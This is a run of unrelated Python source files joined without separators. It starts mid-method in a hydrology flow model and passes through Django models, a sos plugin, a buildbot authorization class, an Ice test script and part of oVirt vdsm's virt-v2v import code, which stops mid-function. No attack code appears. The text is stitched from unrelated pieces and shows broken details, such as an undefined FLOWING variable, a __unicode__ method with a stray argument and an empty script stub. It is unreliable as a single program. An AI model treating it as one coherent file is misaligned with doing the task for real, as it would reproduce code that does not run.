        smoothness = (self.aval / self.z0val) * self.d
          
        #------------------------------------------------
        # Make sure (smoothness > 1) before taking log.
        # Should issue a warning if this is used.
        #------------------------------------------------
        smoothness = np.maximum(smoothness, np.float64(1.1))

        u = self.law_const * np.sqrt(self.Rh * S) * np.log(smoothness)
        
        #--------------------------------------------------------
        # Add a hydraulic jump option for when u gets too big ?
        #--------------------------------------------------------
  
        return u
    
    #   law_of_the_wall()
    #-------------------------------------------------------------------
    def print_status_report(self): 

        #----------------------------------------------------
        # Wherever depth is less than z0, assume that water
        # is not flowing and set u and Q to zero.
        # However, we also need (d gt 0) to avoid a divide
        # by zero problem, even when numerators are zero.
        #----------------------------------------------------
        # FLOWING = (d > (z0/aval))
        #*** FLOWING[noflow_IDs] = False    ;******
        
        wflow    = np.where( FLOWING != 0 )
        n_flow   = np.size( wflow[0] )
        n_pixels = self.rti.n_pixels
        percent  = np.float64(100.0) * (np.float64(n_flow) / n_pixels)
        fstr = ('%5.1f' % percent) + '%'
        # fstr = idl_func.string(percent, format='(F5.1)').strip() + '%'
        print ' Percentage of pixels with flow = ' + fstr
        print ' '

        self.update_mins_and_maxes(REPORT=True)
 
        wmax  = np.where(self.Q == self.Q_max)
        nwmax = np.size(wmax[0])
        print ' Max(Q) occurs at: ' + str( wmax[0] )
        #print,' Max attained at ', nwmax, ' pixels.'
        print ' '
        print '-------------------------------------------------'

    #   print_status_report()         
    #-------------------------------------------------------------------
    def remove_bad_slopes(self, FLOAT=False):

        #------------------------------------------------------------
        # Notes: The main purpose of this routine is to find
        #        pixels that have nonpositive slopes and replace
        #        then with the smallest value that occurs anywhere
        #        in the input slope grid.  For example, pixels on
        #        the edges of the DEM will have a slope of zero.

        #        With the Kinematic Wave option, flow cannot leave
        #        a pixel that has a slope of zero and the depth
        #        increases in an unrealistic manner to create a
        #        spike in the depth grid.

        #        It would be better, of course, if there were
        #        no zero-slope pixels in the DEM.  We could use
        #        an "Imposed gradient DEM" to get slopes or some
        #        method of "profile smoothing".

        #        It is possible for the flow code to be nonzero
        #        at a pixel that has NaN for its slope. For these
        #        pixels, we also set the slope to our min value.

        #        7/18/05. Broke this out into separate procedure.
        #------------------------------------------------------------

        #-----------------------------------
        # Are there any "bad" pixels ?
        # If not, return with no messages.
        #-----------------------------------  
        wb = np.where(np.logical_or((self.slope <= 0.0), \
                              np.logical_not(np.isfinite(self.slope))))
        nbad = np.size(wb[0])
        print 'size(slope) =', np.size(self.slope)
        print 'size(wb) =', nbad
        
        wg = np.where(np.invert(np.logical_or((self.slope <= 0.0), \
                                     np.logical_not(np.isfinite(self.slope)))))
        ngood = np.size(wg[0])
        if (nbad == 0) or (ngood == 0):
            return
        
        #---------------------------------------------
        # Find smallest positive value in slope grid
        # and replace the "bad" values with smin.
        #---------------------------------------------
        print '-------------------------------------------------'
        print 'WARNING: Zero or negative slopes found.'
        print '         Replacing them with smallest slope.'
        print '         Use "Profile smoothing tool" instead.'
        S_min = self.slope[wg].min()
        S_max = self.slope[wg].max()
        print '         min(S) = ' + str(S_min)
        print '         max(S) = ' + str(S_max)
        print '-------------------------------------------------'
        print ' '
        self.slope[wb] = S_min
        
        #--------------------------------
        # Convert data type to double ?
        #--------------------------------
        if (FLOAT):    
            self.slope = np.float32(self.slope)
        else:    
            self.slope = np.float64(self.slope)
        
    #   remove_bad_slopes
    #-------------------------------------------------------------------

#-------------------------------------------------------------------
def Trapezoid_Rh(d, wb, theta):

    #-------------------------------------------------------------
    # Notes: Compute the hydraulic radius of a trapezoid that:
    #          (1) has a bed width of wb >= 0 (0 for triangular)
    #          (2) has a bank angle of theta (0 for rectangular)
    #          (3) is filled with water to a depth of d.
    #        The units of wb and d are meters.  The units of
    #        theta are assumed to be degrees and are converted.
    #-------------------------------------------------------------
    # NB!    wb should never be zero, so PW can never be 0,
    #        which would produce a NaN (divide by zero).
    #-------------------------------------------------------------
    #        See Notes for TF_Tan function in utils_TF.pro
    #            AW = d * (wb + (d * TF_Tan(theta_rad)) )
    #-------------------------------------------------------------    
    theta_rad = (theta * np.pi / 180.0)
    
    AW = d * (wb + (d * np.tan(theta_rad)) )      
    PW = wb + (np.float64(2) * d / np.cos(theta_rad) )
    Rh = (AW / PW)

    w  = np.where(wb <= 0)
    nw = np.size(w[0])
    
    return Rh

#   Trapezoid_Rh()
#-------------------------------------------------------------------
def Manning_Formula(Rh, S, nval):

    #---------------------------------------------------------
    # Notes: R = (A/P) = hydraulic radius [m]
    #        N = Manning's roughness coefficient
    #            (usually in the range 0.012 to 0.035)
    #        S = bed slope (assumed equal to friction slope)

    #        R,S, and N may be 2D arrays.

    #        If length units are all *feet*, then an extra
    #        factor of 1.49 must be applied.  If units are
    #        meters, no such factor is needed.

    #        Note that Q = Ac * u, where Ac is cross-section
    #        area.  For a trapezoid, Ac does not equal w*d.
    #---------------------------------------------------------
    ##  if (N == None): N = np.float64(0.03)

    two_thirds = np.float64(2) / 3.0
    
    u = (Rh ** two_thirds) * np.sqrt(S) / nval
    
    #------------------------------
    # Add a hydraulic jump option
    # for when u gets too big ??
    #------------------------------
    
    return u

#   Manning_Formula()
#-------------------------------------------------------------------
def Law_of_the_Wall(d, Rh, S, z0val):

    #---------------------------------------------------------
    # Notes: u  = flow velocity  [m/s]
    #        d  = flow depth [m]
    #        z0 = roughness height
    #        S  = bed slope (assumed equal to friction slope)

    #        g     = 9.81 = gravitation constant [m/s^2]
    #        kappa = 0.41 = von Karman's constant
    #        aval  = 0.48 = integration constant

    #        sqrt(g)/kappa = 7.6393d
    #        smoothness = (aval / z0) * d
    #        f = (kappa / alog(smoothness))^2d
    #        tau_bed = rho_w * f * u^2 = rho_w * g * d * S

    #        d, S, and z0 can be arrays.

    #        To make default z0 correspond to default
    #        Manning's n, can use this approximation:
    #        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6d
    #        For n=0.03, this gives: z0 = 0.011417
    #        However, for n=0.3, it gives: z0 = 11417.413
    #        which is 11.4 km!  So the approximation only
    #        holds within some range of values.
    #--------------------------------------------------------
##        if (self.z0val == None):    
##            self.z0val = np.float64(0.011417)   # (about 1 cm)

    #------------------------
    # Define some constants
    #------------------------
    g          = np.float64(9.81)    # (gravitation const.)
    aval       = np.float64(0.476)   # (integration const.)
    kappa      = np.float64(0.408)   # (von Karman's const.)
    law_const  = np.sqrt(g) / kappa
        
    smoothness = (aval / z0val) * d
      
    #-----------------------------
    # Make sure (smoothness > 1)
    #-----------------------------
    smoothness = np.maximum(smoothness, np.float64(1.1))

    u = law_const * np.sqrt(Rh * S) * np.log(smoothness)
    
    #------------------------------
    # Add a hydraulic jump option
    # for when u gets too big ??
    #------------------------------
    
    return u
from django.db import models
from django.contrib.auth.models import User


class OrganisationType(models.Model):
    type_desc = models.CharField(max_length=200)
    def __unicode__(self):
        return self.type_desc


class Address(models.Model):
    street_address = models.CharField(max_length=100)
    city = models.CharField(max_length=100)
    pin = models.CharField(max_length=10)
    province = models.CharField(max_length=100)
    nationality = models.CharField(max_length=100)
    def __unicode__(self):
        return self.street_address + ',' + self.city


class HattiUser(models.Model):
    user = models.OneToOneField(User) 
    address = models.ForeignKey(Address)
    telephone = models.CharField(max_length=500)
    date_joined  = models.DateTimeField(auto_now_add=True)
    fax = models.CharField(max_length=100)
    avatar = models.CharField(max_length=100, null=True, blank=True)
    tagline = models.CharField(max_length=140)
    class Meta:
        abstract = True


class AdminOrganisations(HattiUser):
    title = models.CharField(max_length=200)
    organisation_type = models.ForeignKey(OrganisationType)
    def __unicode__(self):
        return self.title


class Customer(HattiUser):
    title = models.CharField(max_length=200, blank=True, null=True)
    is_org = models.BooleanField();
    org_type = models.ForeignKey(OrganisationType)
    company = models.CharField(max_length = 200)
    def __unicode__(self, arg):
	return unicode(self.user)


## Copyright (C) 2007-2012 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
### This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.

## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
## GNU General Public License for more details.

## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin

class SysVIPC(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
    """SysV IPC related information
    """

    plugin_name = "sysvipc"

    def setup(self):
        self.add_copy_specs([
            "/proc/sysvipc/msg",
            "/proc/sysvipc/sem",
            "/proc/sysvipc/shm"
        ])
        self.add_cmd_output("ipcs")

# vim: et ts=4 sw=4

from buildbot.status.web.auth import IAuth

class Authz(object):
    """Decide who can do what."""

    knownActions = [
    # If you add a new action here, be sure to also update the documentation
    # at docs/cfg-statustargets.texinfo
            'gracefulShutdown',
            'forceBuild',
            'forceAllBuilds',
            'pingBuilder',
            'stopBuild',
            'stopAllBuilds',
            'cancelPendingBuild',
    ]

    def __init__(self,
            default_action=False,
            auth=None,
            **kwargs):
        self.auth = auth
        if auth:
            assert IAuth.providedBy(auth)

        self.config = dict( (a, default_action) for a in self.knownActions )
        for act in self.knownActions:
            if act in kwargs:
                self.config[act] = kwargs[act]
                del kwargs[act]

        if kwargs:
            raise ValueError("unknown authorization action(s) " + ", ".join(kwargs.keys()))

    def advertiseAction(self, action):
        """Should the web interface even show the form for ACTION?"""
        if action not in self.knownActions:
            raise KeyError("unknown action")
        cfg = self.config.get(action, False)
        if cfg:
            return True
        return False

    def needAuthForm(self, action):
        """Does this action require an authentication form?"""
        if action not in self.knownActions:
            raise KeyError("unknown action")
        cfg = self.config.get(action, False)
        if cfg == 'auth' or callable(cfg):
            return True
        return False

    def actionAllowed(self, action, request, *args):
        """Is this ACTION allowed, given this http REQUEST?"""
        if action not in self.knownActions:
            raise KeyError("unknown action")
        cfg = self.config.get(action, False)
        if cfg:
            if cfg == 'auth' or callable(cfg):
                if not self.auth:
                    return False
                user = request.args.get("username", ["<unknown>"])[0]
                passwd = request.args.get("passwd", ["<no-password>"])[0]
                if user == "<unknown>" or passwd == "<no-password>":
                    return False
                if self.auth.authenticate(user, passwd):
                    if callable(cfg) and not cfg(user, *args):
                        return False
                    return True
                return False
            else:
                return True # anyone can do this..

#! /usr/bin/env python
# encoding: UTF-8

'''give access permission for files in this folder'''

#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************

import os, sys, traceback

import Ice, AllTests

def test(b):
    if not b:
        raise RuntimeError('test assertion failed')

def usage(n):
    sys.stderr.write("Usage: " + n + " port...\n")

def run(args, communicator):
    ports = []
    for arg in args[1:]:
        if arg[0] == '-':
            sys.stderr.write(args[0] + ": unknown option `" + arg + "'\n")
            usage(args[0])
            return False

        ports.append(int(arg))

    if len(ports) == 0:
        sys.stderr.write(args[0] + ": no ports specified\n")
        usage(args[0])
        return False

    try:
        AllTests.allTests(communicator, ports)
    except:
        traceback.print_exc()
        test(False)

    return True

try:
    initData = Ice.InitializationData()
    initData.properties = Ice.createProperties(sys.argv)
    
    #
    # This test aborts servers, so we don't want warnings.
    #
    initData.properties.setProperty('Ice.Warn.Connections', '0')

    communicator = Ice.initialize(sys.argv, initData)
    status = run(sys.argv, communicator)
except:
    traceback.print_exc()
    status = False

if communicator:
    try:
        communicator.destroy()
    except:
        traceback.print_exc()
        status = False

sys.exit(not status)

# Copyright 2014-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""
When importing a VM a thread start with a new process of virt-v2v.
The way to feedback the information on the progress and the status of the
process (ie job) is via getVdsStats() with the fields progress and status.
progress is a number which represent percentage of a single disk copy,
status is a way to feedback information on the job (init, error etc)
"""

from __future__ import absolute_import

from collections import namedtuple
from contextlib import closing, contextmanager
import errno
import io
import logging
import os
import re
import subprocess
import tarfile
import time
import threading
import xml.etree.ElementTree as ET
import zipfile

import libvirt

from vdsm.cmdutils import wrap_command
from vdsm.commands import execCmd, BUFFSIZE
from vdsm.common import cmdutils
from vdsm.common.define import errCode, doneCode
from vdsm.common import response
from vdsm.common import zombiereaper
from vdsm.common.compat import CPopen
from vdsm.common.logutils import traceback
from vdsm.common.time import monotonic_time
from vdsm.constants import P_VDSM_LOG, P_VDSM_RUN, EXT_KVM_2_OVIRT
from vdsm import concurrent, libvirtconnection
from vdsm import password
from vdsm.utils import terminating, NICENESS, IOCLASS

try:
    import ovirt_imageio_common
except ImportError:
    ovirt_imageio_common = None


_lock = threading.Lock()
_jobs = {}

_V2V_DIR = os.path.join(P_VDSM_RUN, 'v2v')
_LOG_DIR = os.path.join(P_VDSM_LOG, 'import')
_VIRT_V2V = cmdutils.CommandPath('virt-v2v', '/usr/bin/virt-v2v')
_SSH_AGENT = cmdutils.CommandPath('ssh-agent', '/usr/bin/ssh-agent')
_SSH_ADD = cmdutils.CommandPath('ssh-add', '/usr/bin/ssh-add')
_XEN_SSH_PROTOCOL = 'xen+ssh'
_VMWARE_PROTOCOL = 'vpx'
_KVM_PROTOCOL = 'qemu'
_SSH_AUTH_RE = '(SSH_AUTH_SOCK)=([^;]+).*;\nSSH_AGENT_PID=(\d+)'
_OVF_RESOURCE_CPU = 3
_OVF_RESOURCE_MEMORY = 4
_OVF_RESOURCE_NETWORK = 10
_QCOW2_COMPAT_SUPPORTED = ('0.10', '1.1')

# OVF Specification:
# https://www.iso.org/obp/ui/#iso:std:iso-iec:17203:ed-1:v1:en
_OVF_NS = 'http://schemas.dmtf.org/ovf/envelope/1'
_RASD_NS = 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/' \
           'CIM_ResourceAllocationSettingData'

ImportProgress = namedtuple('ImportProgress',
                            ['current_disk', 'disk_count', 'description'])
DiskProgress = namedtuple('DiskProgress', ['progress'])


class STATUS:
    '''
    STARTING: request granted and starting the import process
    COPYING_DISK: copying disk in progress
    ABORTED: user initiated aborted
    FAILED: error during import process
    DONE: convert process successfully finished
    '''
    STARTING = 'starting'
    COPYING_DISK = 'copying_disk'
    ABORTED = 'aborted'
    FAILED = 'error'
    DONE = 'done'


class V2VError(Exception):
    ''' Base class for v2v errors '''
    err_name = 'unexpected'  # TODO: use more specific error


class ClientError(Exception):
    ''' Base class for client error '''
    err_name = 'unexpected'


class InvalidVMConfiguration(ValueError):
    ''' Unexpected error while parsing libvirt domain xml '''


class OutputParserError(V2VError):
    ''' Error while parsing virt-v2v output '''


class JobExistsError(ClientError):
    ''' Job already exists in _jobs collection '''
    err_name = 'JobExistsError'


class VolumeError(ClientError):
    ''' Error preparing volume '''


class NoSuchJob(ClientError):
    ''' Job not exists in _jobs collection '''
    err_name = 'NoSuchJob'


class JobNotDone(ClientError):
    ''' Import process still in progress '''
    err_name = 'JobNotDone'


class NoSuchOvf(V2VError):
    ''' Ovf path is not exists in /var/run/vdsm/v2v/ '''
    err_name = 'V2VNoSuchOvf'


class V2VProcessError(V2VError):
    ''' virt-v2v process had error in execution '''


class InvalidInputError(ClientError):
    ''' Invalid input received '''


def get_external_vms(uri, username, password, vm_names=None):
    if vm_names is not None:
        if not vm_names:
            vm_names = None
        else:
            vm_names = frozenset(vm_names)

    try:
        conn = libvirtconnection.open_connection(uri=uri,
                                                 username=username,
                                                 passwd=password)
    except libvirt.libvirtError as e:
        logging.exception('error connecting to hypervisor')
        return {'status': {'code': errCode['V2VConnection']['status']['code'],
                           'message': str(e)}}

    with closing(conn):
        vms = []
        for vm in _list_domains(conn):
            if vm_names is not None and vm.name() not in vm_names:
                # Skip this VM.
                continue
            elif conn.getType() == "ESX" and _vm_has_snapshot(vm):
                logging.error("vm %r has snapshots and therefore can not be "
                              "imported since snapshot conversion is not "
                              "supported for VMware", vm.name())
                continue
            _add_vm(conn, vms, vm)
        return {'status': doneCode, 'vmList': vms}


def get_external_vm_names(uri, username, password):
    try:
        conn = libvirtconnection.open_connection(uri=uri,
                                                 username=username,
                                                 passwd=password)
    except libvirt.libvirtError as e:
        logging.exception('error connecting to hypervisor')
        return response.error('V2VConnection', str(e))

    with closing(conn):
        vms = [vm.name() for vm in _list_domains(conn)]
        return response.success(vmNames=vms)


def convert_external_vm(uri, username, password, vminfo, job_id, irs):
    if uri.startswith(_XEN_SSH_PROTOCOL):
        command = XenCommand(uri, vminfo, job_id, irs)
    elif uri.startswith(_VMWARE_PROTOCOL):
        command = LibvirtCommand(uri, username, password, vminfo, job_id,
                                 irs)
    elif uri.startswith(_KVM_PROTOCOL):
        if ovirt_imageio_common is None:
            raise V2VError('Unsupported protocol KVM, ovirt_imageio_common'
                           'package is needed for importing KVM images')
        command = KVMCommand(uri, username, password, vminfo, job_id, irs)
    else:
        raise ClientError('Unknown protocol for Libvirt uri: %s', uri)
    job = ImportVm(job_id, command)
    job.start()
    _add_job(job_id, job)
    return {'status': doneCode}


def convert_ova(ova_path, vminfo, job_id, irs):
    command = OvaCommand(ova_path, vminfo, job_id, irs)
    job = ImportVm(job_id, command)
    job.start()
    _add_job(job_id, job)
    return response.success()


def get_ova_info(ova_path):
    ns = {'ovf': _OVF_NS, 'rasd': _RASD_NS}

    try:
        root = ET.fromstring(_read_ovf_from_ova(ova_path))
    except ET.ParseError as e:
        raise V2VError('Error reading ovf from ova, position: %r' % e.position)

    vm = {}
    _add_general_ovf_info(vm, root, ns, ova_path)
    _add_disks_ovf_info(vm, root, ns)
    _add_networks_ovf_info(vm, root, ns)

    return response.success(vmList=vm)


def get_converted_vm(job_id):
    try:
        job = _get_job(job_id)
        _validate_job_done(job)
        ovf = _read_ovf(job_id)
    except ClientError as e:
        logging.info('Converted VM error %s', e)
        return errCode[e.err_name]
    except V2VError as e:
        logging.error('Converted VM error %s', e)
        return errCode[e.err_name]
    return {'status': doneCode, 'ovf': ovf}


def delete_job(job_id):
    try:
        job = _get_job(job_id)
        _validate_job_finished(job)
        _remove_job(job_id)
    except ClientError as e:
        logging.info('Cannot delete job, error: %s', e)
        return errCode[e.err_name]
    return {'status': doneCode}


def abort_job(job_id):
    try:
        job = _get_job(job_id)
        job.abort()
    except ClientError as e:
        logging.info('Cannot abort job, error: %s', e)
        return errCode[e.err_name]
    return {'status': doneCode}


def get_jobs_status():
    ret = {}
    with _lock:
        items = tuple(_jobs.items())
    for job_id, job in items:
        ret[job_id] = {
            'status': job.status,
            'description': job.description,
            'progress': job.progress
        }
    return ret


def _add_job(job_id, job):
    with _lock:
        if job_id in _jobs:
            raise JobExistsError("Job %r exists" % job_id)
        _jobs[job_id] = job


def _get_job(job_id):
    with _lock:
        if job_id not in _jobs:
            raise NoSuchJob("No such job %r" % job_id)
        return _jobs[job_id]


def _remove_job(job_id):
    with _lock:
        if job_id not in _jobs:
            raise NoSuchJob("No such job %r" % job_id)
        del _jobs[job_id]


def _validate_job_done(job):
    if job.status != STATUS.DONE:
        raise JobNotDone("Job %r is %s" % (job.id, job.status))


def _validate_job_finished(job):
    if job.status not in (STATUS.DONE, STATUS.FAILED, STATUS.ABORTED):
        raise JobNotDone("Job %r is %s" % (job.id, job.status))


def _read_ovf(job_id):
    file_name = os.path.join(_V2V_DIR, "%s.ovf" % job_id)
    try:
        with open(file_name, 'r') as f:
            return f.read()
    except IOError as e:
        if e.errno != errno.ENOENT:
            raise
        raise NoSuchOvf("No such ovf %r" % file_name)


class SSHAgent(object):
    """
    virt-v2v uses ssh-agent for importing xen vms from libvirt,
    after virt-v2v log in to the machine it needs to copy its disks
    which ssh-agent let it handle without passwords while the session
    is on.
    for more information please refer to the virt-v2v man page:
    http://libguestfs.org/virt-v2v.1.html
    """
    def __init__(self):
        self._auth = None
        self._agent_pid = None
        self._ssh_auth_re = re.compile(_SSH_AUTH_RE)

    def __enter__(self):
        rc, out, err = execCmd([_SSH_AGENT.cmd], raw=True)
        if rc != 0:
            raise V2VError('Error init ssh-agent, exit code: %r'
                           ', out: %r, err: %r' %
                           (rc, out, err))

        m = self._ssh_auth_re.match(out)
        # looking for: SSH_AUTH_SOCK=/tmp/ssh-VEE74ObhTWBT/agent.29917
        self._auth = {m.group(1): m.group(2)}
        self._agent_pid = m.group(3)

        try:
            rc, out, err = execCmd([_SSH_ADD.cmd], env=self._auth)
        except:
            self._kill_agent()
            raise

        if rc != 0:
            # 1 = general fail
            # 2 = no agnet
            if rc != 2:
                self._kill_agent()
            raise V2VError('Error init ssh-add, exit code: %r'
                           ', out: %r, err: %r' %
                           (rc, out, err))

    def __exit__(self, *args):
        rc, out, err = execCmd([_SSH_ADD.cmd, '-d'], env=self._auth)
        if rc != 0:
            logging.error('Error deleting ssh-add, exit code: %r'
                          ', out: %r, err: %r' %
                          (rc, out, err))

        self._kill_agent()

    def _kill_agent(self):
        rc, out, err = execCmd([_SSH_AGENT.cmd, '-k'],
                               env={'SSH_AGENT_PID': self._agent_pid})
        if rc != 0:
            logging.error('Error killing ssh-agent (PID=%r), exit code: %r'
                          ', out: %r, err: %r' %
                          (self._agent_pid, rc, out, err))

    @property
    def auth(self):
        return self._auth


class V2VCommand(object):
    def __init__(self, vminfo, vmid, irs):
        self._vminfo = vminfo
        self._vmid = vmid
        self._irs = irs
        self._prepared_volumes = []
        self._passwd_file = os.path.join(_V2V_DIR, "%s.tmp" % vmid)
        self._password = password.ProtectedPassword('')
        self._base_command = [_VIRT_V2V.cmd, '-v', '-x']
        self._query_v2v_caps()
        if 'qcow2_compat' in vminfo:
            qcow2_compat = vminfo['qcow2_compat']
            if qcow2_compat not in _QCOW2_COMPAT_SUPPORTED:
                logging.error('Invalid QCOW2 compat version %r' %
                              qcow2_compat)
                raise ValueError('Invalid QCOW2 compat version %r' %
                                 qcow2_compat)
            if 'vdsm-compat-option' in self._v2v_caps:
                self._base_command.extend(['--vdsm-compat', qcow2_compat])
            elif qcow2_compat != '0.10':
                # Note: qcow2 is only a suggestion from the engine
                # if virt-v2v doesn't support it we fall back to default
                logging.info('virt-v2v not supporting qcow2 compat version: '
                             '%r', qcow2_compat)

    def execute(self):
        raise NotImplementedError("Subclass must implement this")

    def _command(self):
        raise NotImplementedError("Subclass must implement this")

    def _start_helper(self):
        timestamp = time.strftime('%Y%m%dT%H%M%S')
        log = os.path.join(_LOG_DIR,
                           "import-%s-%s.log" % (self._vmid, timestamp))
        logging.info("Storing import log at: %r", log)
        v2v = _simple_exec_cmd(self._command(),
                               nice=NICENESS.HIGH,
                               ioclass=IOCLASS.IDLE,
                               env=self._environment(),
                               stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
        tee = _simple_exec_cmd(['tee', log],
                               nice=NICENESS.HIGH,
                               ioclass=IOCLASS.IDLE,
                               stdin=v2v.stdout,
                               stdout=subprocess.PIPE)

        return PipelineProc(v2v, tee)

    def _get_disk_format(self):
        fmt = self._vminfo.get('format', 'raw').lower()
        return "qcow2" if fmt == "cow" else fmt

    def _disk_parameters(self):
        parameters = []
        for disk in self._vminfo['disks']:
            try:
                parameters.append('--vdsm-image-uuid')
                parameters.append(disk['imageID'])
                parameters.append('--vdsm-vol-uuid')
                parameters.append(disk['volumeID'])
            except KeyError as e:
                raise InvalidInputError('Job %r missing required property: %s'
                                        % (self._vmid, e))
        return parameters

    @contextmanager
    def _volumes(self):
        self._prepare_volumes()
        try:
            yield
        finally:
            self._teardown_volumes()

    def _prepare_volumes(self):
        if len(self._vminfo['disks']) < 1:
            raise InvalidInputError('Job %r cannot import vm with no disk',
                                    self._vmid)

        for disk in self._vminfo['disks']:
            drive = {'poolID': self._vminfo['poolID'],
                     'domainID': self._vminfo['domainID'],
                     'volumeID': disk['volumeID'],
                     'imageID': disk['imageID']}
            res = self._irs.prepareImage(drive['domainID'],
                                         drive['poolID'],
                                         drive['imageID'],
                                         drive['volumeID'])
            if res['status']['code']:
                raise VolumeError('Job %r bad volume specification: %s' %
                                  (self._vmid, drive))

            drive['path'] = res['path']
            self._prepared_volumes.append(drive)

    def _teardown_volumes(self):
        for drive in self._prepared_volumes:
            try:
                self._irs.teardownImage(drive['domainID'],
                                        drive['poolID'],
                                        drive['imageID'])
            except Exception as e:
                logging.error('Job %r error tearing down drive: %s',
                              self._vmid, e)

    def _get_storage_domain_path(self, path):
        '''
        prepareImage returns /prefix/sdUUID/images/imgUUID/volUUID
        we need storage domain absolute path so we go up 3 levels
        '''
        return path.rsplit(os.sep, 3)[0]

    def _environment(self):
        # Provide some sane environment
        env = os.environ.copy()

        # virt-v2v specific variables
        env['LIBGUESTFS_BACKEND'] = 'direct'
        if 'virtio_iso_path' in self._vminfo:
            env['VIRTIO_WIN'] = self._vminfo['virtio_iso_path']
        return env

    @contextmanager
    def _password_file(self):
        fd = os.open(self._passwd_file, os.O_WRONLY | os.O_CREAT, 0o600)
        try:
            if self._password.value is None:
                os.write(fd, "")
            else:
                os.write(fd, self._password.value)
        finally:
            os.close(fd)
        try:
            yield
        finally:
            try:
                os.remove(self._passwd_file)
            except Exception:
                logging.exception("Job %r error removing passwd file: %s",
                                  self._vmid, self._passwd_file)

    def _query_v2v_caps(self):
        self._v2v_caps = frozenset()
        p = _simple_exec_cmd([_VIRT_V2V.cmd, '--machine-readable'],
                             env=os.environ.copy(),
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with terminating(p):
            try:
                out, err = p.communicate()
            except Exception:
                logging.exception('Terminating virt-v2v process after error')
                raise
        if p.returncode != 0:
            raise V2VProcessError(
                'virt-v2v exited with code: %d, stderr: %r' %
                (p.returncode, err))

        self._v2v_caps = frozenset(out.splitlines())
        logging.debug("Detected virt-v2v capabilities: %r", self._v2v_caps)


class LibvirtCommand(V2VCommand):
    def __init__(self, uri, username, password, vminfo, vmid, irs):
        super(LibvirtCommand, self).__init__(vminfo, vmid, irs)
        self._uri = uri
        self._username = username
        self._password = password

    def _command(self):
        cmd = self._base_command
        cmd.extend(['-ic', self._uri,
                    '-o', 'vdsm',
                    '-of', self._get_disk_format(),
                    '-oa', self._vminfo.get('allocation', 'sparse').lower()])
        cmd.extend(self._disk_parameters())
        cmd.extend(['--password-file',
                    self._passwd_file,
                    '--vdsm-vm-uuid',
                    self._vmid,
                    '--vdsm-ovf-output',
                    _V2V_DIR,
                    '--machine-readable',
                    '-os',
                    self._get_storage_domain_path(
                        self._prepared_volumes[0]['path']),
                    self._vminfo['vmName']])
        return cmd

    @contextmanager
    def execute(self):
        with self._volumes(), self._password_file():
            yield self._start_helper()


class OvaCommand(V2VCommand):
    def __init__(self, ova_path, vminfo, vmid, irs):
        super(OvaCommand, self).__init__(vminfo, vmid, irs)
        self._ova_path = ova_path

    def _command(self):
        cmd = self._base_command
        cmd.extend(['-i', 'ova', self._ova_path,
                    '-o', 'vdsm',
                    '-of', self._get_disk_format(),
                    '-oa', self._vminfo.get('allocation', 'sparse').lower(),
                    '--vdsm-vm-uuid',
                    self._vmid,
                    '--vdsm-ovf-output',
                    _V2V_DIR,
                    '--machine-readable',
                    '-os',
                    self._get_storage_domain_path(
                        self._prepared_volumes[0]['path'])])
        cmd.extend(self._disk_parameters())
        return cmd

    @contextmanager
    def execute(self):
        with self._volumes():
            yield self._start_helper()


class XenCommand(V2VCommand):
    """
    Importing Xen via virt-v2v require to use xen+ssh protocol.
    this requires:
    - enable the vdsm user in /etc/passwd
    - generate ssh keys via ssh-keygen
    - public key exchange with the importing hosts user
    - host must be in ~/.ssh/known_hosts (done automatically
      by ssh to the host before importing vm)
    """
    def __init__(self, uri, vminfo, job_id, irs):
        super(XenCommand, self).__init__(vminfo, job_id, irs)
        self._uri = uri
        self._ssh_agent = SSHAgent()

    def _command(self):
        cmd = self._base_command
        cmd.extend(['-ic', self._uri,
                    '-o', 'vdsm',
                    '-of', self._get_disk_format(),
                    '-oa', self._vminfo.get('allocation', 'sparse').lower()])
        cmd.extend(self._disk_parameters())
        cmd.extend(['--vdsm-vm-uuid',
                    self._vmid,
                    '--vdsm-ovf-output',
                    _V2V_DIR,
                    '--machine-readable',
                    '-os',
                    self._get_storage_domain_path(
                        self._prepared_volumes[0]['path']),
                    self._vminfo['vmName']])
        return cmd

    @contextmanager
    def execute(self):
        with self._volumes(), self._ssh_agent:
            yield self._start_helper()

    def _environment(self):
        env = super(XenCommand, self)._environment()
        env.update(self._ssh_agent.auth)
        return env


class KVMCommand(V2VCommand):
    def __init__(self, uri, username, password, vminfo, vmid, irs):
        super(KVMCommand, self).__init__(vminfo, vmid, irs)
        self._uri = uri
        self._username = username
        self._password = password

    def _command(self):
        cmd = [EXT_KVM_2_OVIRT,
               '--uri', self._uri]
        if self._username is not None:
            cmd.extend([
                '--username', self._username,
                '--password-file', self._passwd_file])
        src, fmt = self._source_images()
        cmd.append('--source')
        cmd.extend(src)
        cmd.append('--dest')
        cmd.extend(self._dest_images())
        cmd.append('--storage-type')
        cmd.extend(fmt)
        cmd.append('--vm-name')
        cmd.append(self._vminfo['vmName'])
        return cmd

    @contextmanager
    def execute(self):
        with self._volumes(), self._password_file():
            yield self._start_helper()

    def _source_images(self):
        con = libvirtconnection.open_connection(uri=self._uri,
                                                username=self._username,
                                                passwd=self._password)

        with closing(con):
